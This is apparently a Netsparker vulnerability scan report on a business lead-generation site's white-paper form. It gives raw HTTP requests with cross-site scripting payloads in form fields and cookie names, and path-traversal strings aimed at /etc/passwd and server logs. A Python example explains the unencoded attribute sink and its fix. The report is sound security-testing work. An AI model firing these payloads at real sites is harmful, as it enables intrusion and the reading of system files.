OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 206
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003F5)%3c%2fscript%3e&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=0D21F11002A3C6CBCAE1E116BCC8AE25; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="'"--></style></script><script>netsparker(0x0003F5)</script>"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&nbsp;</td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x000439)</script>
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000439)%3c%2fscript%3e&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F607FB0A2B29A85F6626116F503E161; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="'"--></style></script><script>netsparker(0x000439)</script>"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&am..
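The two /whitePapaper.html entries (firstName and iusrc), like the email reflection shown at the top of this section, share one sink: the submitted value is written back into the `value="..."` attribute of the form's `<input>` without HTML-attribute encoding, so the leading `'"` closes the attribute and the `</style></script><script>...</script>` tail is parsed as markup. The script below is an added example, not Netsparker's code and not taken from the site; it models that sink in Python (the target runs Java, judging by the JSESSIONID cookie, where the equivalent fix is output encoding at the JSP/servlet layer, e.g. JSTL's `fn:escapeXml`). The response excerpt, the marker id and all function names are constructed for the example. One caveat when reproducing: the Cookie header in the report's request carries OAVARS[...] names containing traversal and script strings left over from earlier scanner engines; they are not part of this finding, so resend the POST with an empty cookie jar to confirm the reflection comes from the form parameter alone.

```python
import html
import re

# Constructed to mirror the report: the scanner's marker id and the payload it sent
# in the firstName parameter of POST /whitePapaper.html (hypothetical values; only
# the shape matters).
MARKER_ID = "0x000439"
PAYLOAD = "'\"--></style></script><script>netsparker(" + MARKER_ID + ")</script>"

# Constructed excerpt of the vulnerable response body, as the report shows the input
# reflected into the First Name field.
VULNERABLE_FRAGMENT = (
    '<tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> '
    '<input name="firstName" type="text" value="' + PAYLOAD + '"/> </td> </tr>'
)


def render_input_unsafe(name: str, value: str) -> str:
    """The pattern behind the finding: the submitted value is concatenated straight
    into a double-quoted attribute, so a value containing a double quote closes the
    attribute and the rest of the string becomes markup."""
    return '<input name="%s" type="text" value="%s"/>' % (name, value)


def render_input_safe(name: str, value: str) -> str:
    """Hardened form: HTML-attribute-encode the value. quote=True escapes both quote
    characters as well as < > &, so the browser only ever sees text."""
    return '<input name="%s" type="text" value="%s"/>' % (
        name, html.escape(value, quote=True))


def reflection_context(body: str, marker_id: str) -> str:
    """Classify how the marker comes back in a response body.

    'executable' -- a literal <script>netsparker(marker)</script> element is present,
                    which is the condition the scanner reports as CONFIRMED;
    'encoded'    -- the marker text is present but the tag was neutralised
                    (e.g. &lt;script&gt;), i.e. the sink is output-encoded;
    'absent'     -- the input is not reflected at all.
    """
    executable = re.compile(
        r"<script>netsparker\(" + re.escape(marker_id) + r"\)</script>", re.IGNORECASE)
    if executable.search(body):
        return "executable"
    if marker_id in body:
        return "encoded"
    return "absent"


def attribute_is_broken_out(fragment: str, name: str) -> bool:
    """True if the value attribute of <input name=...> ends before the tag's real
    closing quote, i.e. an injected double quote terminated the attribute early."""
    m = re.search(
        r'<input name="%s" type="text" value="([^"]*)"' % re.escape(name), fragment)
    if m is None:
        return False
    # In the intact tag the first closing quote is followed by "/>"; anything else
    # means the attribute was cut short and the remainder is parsed as markup.
    return not fragment[m.end():].startswith("/>")


if __name__ == "__main__":
    print("vulnerable:", reflection_context(VULNERABLE_FRAGMENT, MARKER_ID),
          attribute_is_broken_out(VULNERABLE_FRAGMENT, "firstName"))
    fixed = render_input_safe("firstName", PAYLOAD)
    print("hardened:  ", reflection_context(fixed, MARKER_ID),
          attribute_is_broken_out(fixed, "firstName"))
    print(fixed)
```

`reflection_context` is the same three-way test you would run over a real captured response: a literal `<script>netsparker(id)</script>` in the body is what makes the scanner mark the entry CONFIRMED, while the marker id surviving only inside entity-encoded text means the sink has been fixed, not merely hidden. Because the hidden field iusrc is reflected the same way, the encoding must be applied to every value the form echoes, not only the visible ones.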
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
